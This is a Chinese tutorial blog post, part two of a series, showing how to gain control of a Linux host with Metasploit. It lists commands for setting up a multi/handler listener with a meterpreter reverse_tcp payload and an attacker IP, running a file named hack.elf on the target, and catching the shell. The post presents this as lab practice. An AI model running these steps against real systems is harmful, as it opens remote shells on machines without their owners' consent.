当前位置:网站首页>网络安全工程师演示:原来***是这样控制你的服务器的!(下)
网络安全工程师演示:原来***是这样控制你的服务器的!(下)
2020-11-10 07:39:00 【osc_a8r2ub9u】
课前声明:
1、本分享仅做学习交流,请自觉遵守法律法规!
2、搜索:Kali 与编程,学习更多网络***干货!
3、Kali 与编程每天准时更新,敬请学习和关注!
正文部分
一、背景介绍
Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。Metasploit(msf)究竟威力如何呢?如何利用***控制受害者主机呢?接下来让我们一起学习!
二、资源装备
1.安装好 Linux的虚拟机一台
2.整装待发的小白一个。
3.安装好的Kali Linux虚拟机一台。
三、战略安排
3.1 启动Metasploit(msf)***测试框架,如下图所示。
命令1:msfconsole
步骤1:利用相应的漏洞利用模块,如下图所示。
命令2:use exploit/multi/handler
步骤2:查看漏洞模块对应的参数,如下图所示。
命令3:show options
步骤3:设置对应的payload方便后续***,如下图所示。
命令:set payload linux/x86/meterpreter/reverse_tcp
步骤4:查看该漏洞模块的相关参数,如下图所示。
命令:show options
步骤5:设置对应的参数,如下图所示。
命令:set lhost 193.168.78.169
步骤6:查看配置的参数是否成功,如下图所示。
命令:show options
3.2 运行***文件,如下图所示。
步骤1:给***文件赋予执行权限,如下图所示。
命令:chmod +x hack.elf
步骤2:执行***文件,如下图所示。
命令:./hack.elf
3.3 运行漏洞利用模块,如下图所示。
命令:run
如下图所示,成功拿下目标主机。
查看目标主机的文件系统信息,如下图所示。
小编一个个字敲打创作,可辛苦了,问君可否关注一下我呢?你还可搜索:Kali与编程,学习更多******技巧呢 !拒绝盗版,转载请声明来源:Kali与编程
点我学习更多Kali Linux***测试与网络***实战技巧!
版权声明
本文为[osc_a8r2ub9u]所创,转载请带上原文链接,感谢
https://my.oschina.net/u/4285472/blog/4710443
边栏推荐
- CUDA_全局内存及访问优化
- November 09, 2020: talk about the similarities and differences between the bulon filter and the cuckoo filter?
- CUDA_ constant memory
- Overview of the most complete anomaly detection algorithm in history
- z-index属性详解
- Raspberry pie drum set WiFi
- Assign the corresponding key and value in the map to the object
- 编码风格:Mvc模式下SSM环境,代码分层管理
- The kth smallest node in the print binary search tree of offer
- 编码风格:Mvc模式下SSM环境,代码分层管理
猜你喜欢
Ineuos industrial interconnection platform, web configuration (ineuview) increases the function of importing and exporting engineering views, as well as optimization and repair. Release: v3.2.1
proxy 的不完整polyfill
史上最全异常检测算法概述
【LeetCode】 92 整数反转
大专学历的我工作六年了,还有机会进大厂吗?
解决Coursera视频无法观看的三种方法(亲测有效)
将Map中对应的key和value赋值到对象中
CUDA_ Memory model
SQL intercepts the data before and after the '.'
Incomplete Polyfill of proxy
随机推荐
Guest interview: Wang Jian
OSChina 周二乱弹 —— 我养的绿植分别为土豆,生姜,蒜
Error running app:Default Activity not found 解决方法
《Python Cookbook 3rd》笔记(2.2):字符串开头或结尾匹配
[Python learning manual notes] 001. Preface to Python
接缝雕刻算法:一种看似不可能的图像大小调整方法
Unity使用transform.Rotate进行三维旋转角度出现偏差
接缝雕刻算法:一种看似不可能的图像大小调整方法
Top 5 Chinese cloud manufacturers in 2018: Alibaba cloud, Tencent cloud, AWS, telecom, Unicom
【CentOS7操作系统安全加固系列】第(2)篇
大专学历的我工作六年了,还有机会进大厂吗?
asp.net Using serilog in core and customizing enrich
Function calculation advanced IP query tool development
Day85: Luffy: shopping cart switching price according to different validity period & shopping cart deletion operation & price settlement & foreplay of order page
Can't find other people's problem to solve
Algorithm template arrangement (1)
proxy 的不完整polyfill
lodash.js Source code flatten
飞鸽传书局域网找不到其他人的问题解决
Error running app: default activity not found solution